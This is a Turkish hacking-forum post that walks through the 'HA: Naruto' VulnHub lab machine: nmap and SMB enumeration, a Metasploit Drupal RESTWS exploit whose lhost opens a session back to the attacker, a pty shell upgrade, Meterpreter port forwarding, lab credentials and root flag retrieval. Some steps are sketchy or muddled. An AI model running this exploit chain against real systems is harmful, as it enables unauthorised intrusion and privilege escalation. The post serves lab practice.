HA: Naruto Zafiyetli Makine Çözümü // Xowly

Xowly

Katılımcı Üye
17 Haz 2019
769
57
ғate
HA: Naturo Zafiyetli Makine Çözümü


Merhabalar değerli Türk Hack Team ailesi, bu konumda sizlere "HA: Naruto Zafiyetli Makine Çözümünü" göstereceğim. Zafiyetli Makine Çözümünü yaptığım kaynağa ulaşmak için tıklayın; Tıklayın.https://www.hackingarticles.in/ha-naruto-vulnhub-walkthrough/

zbz765.png
HA: Naruto

JHW230.png


İsim: HA: Naruto

Çıkış Tarihi: 11 Ocak 2019

Yapım: Aarti Singh & Hacking Articles

Dosya Boyutu: 1001/mb

Zorluk: Kolay

Açıklama: “Bir Numara Hiperaktif, Knucklehead Ninja”

Hedef: final.txt

Seri: HA

9cM5eC.png


Her şeyden önce hedefimizi belirlemeye çalışıyoruz ve bunun için aşağıdaki komutu kullanıyoruz: netdiscover

Şimdi açık portlar ve hedef makinede çalışan servisler hakkında bilgi edinmek için Nmap kullanarak agresif bir port taraması yapacağız.

Kod:
 nmap -A 192.168.0.4

fNUaOQ.png




Taramanın sonucunda 80,22,139 ve 445 Apache, SSH ve Smb portlarının açık bir halde aktif olduğunu
görüyoruz. Ardından tarayıcımıza 192.168.0.4 yazarak anasayfamıza gidiyoruz.



zCTSRL.png



Smbclient ile içeride bulunan dosyaları taratıyoruz ve ardından karşımıza "uzumaki.txt" metin belgesi çıkıyor.

Kod:
 smbclient -L \\192.168.0.4


z67ABN.png



Aşağıdaki komutu kullanarak bilgisayara "uzumaki.txt" dosyasını aktarıyoruz.

Kod:
 smbclient //192.168.0.4/Naruto

Ardından aşağıdaki komutu terminalimize yazarak dosyayı görüntülüyoruz.

Kod:
 cat uzumaki.txt


7x8QAK.png




Sonra metin dosyasını açmak için cat komutunu kullandık ve bu kelimenin metin dosyasında çift tırnak içinde
olduğunu gördüğümüz gibi “Gara” ipucunu aldık.


Daha sonrasında bunu tarayıcı içerisinde açmayı denedik ve hoşgeldin sayfasına erişdik.

855bSe.png




Şimdi eski dostumuz Me'tasploit'i daha önce bulduğumuz Drupal Sayfasından yararlanmak için kullanacağız.

Kod:
 msf5 > use exploit/unix/webapp/drupal_restws_unserialize


Kod:
 msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set rhosts 192.168.0.4


Kod:
 msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set targeturi /gara


Kod:
 msf5 exploit (unix/webapp/ drupal_restws_unserialize) > set lhost 192.168.0.5


Kod:
 msf5 exploit (unix/webapp/ drupal_restws_unserialize) > exploit



Session oturumuna girdikten sonra hedef sistemde bir shell elde etmek için “shell” komutunu kullandık.

Kod:
 python3 -c 'import pty;pty.spawn("/bin/bash")'


Numaralandırma işlemine, bize portlarıyla olan tüm bağlantıları gösteren aşağıdaki komutu kullanarak gideceğiz.

Kod:
 netstat -antp


AUV9U3.png




Yerel ağ statikimizi TCP ve UDP bağlantıları için kontrol edersek, 8080 çalıştıran bir şey olduğunu görürüz ve nmap bile bunun için hiçbir şey göstermez. Sayaç yardımıyla, 8080 servis portunu yerel ev sahibimize: 8080 yönlendirdik.

Kod:
portfwd add -l 8080 -p 8080 -r 127.0.0.1

Hizmeti yerel makinemize ilettikten sonra, burada yaptığımız gibi web tarayıcısını keşfedebiliriz.

Bu bize aşağıdaki kimlik bilgilerini sağlayacaktır:


User: yashika
Password: raj@123



Şimdi yapmamız gereken, bu kullanıcıya tüm root izinlerini verecek su komutunu çalıştırmak ve bununla aşağıdaki kimlik bilgilerini kullanarak başarıyla giriş yaptık:

Gy0NOO.png




Kullanıcının yetkilerinin ve bu özelliklerin etkin olup olmadığını öğrenmek için aşağıdaki komutu kullanacağız:

Kod:
 getcap -r / 2>/dev/null


Kod:
 id


Kod:
 cd /root


Kod:
 cat final.txt


czUdKP.png



Sonucunda kahramanımız "Naruto" karşımıza çıktı.




Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler


T5a2CB.png
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.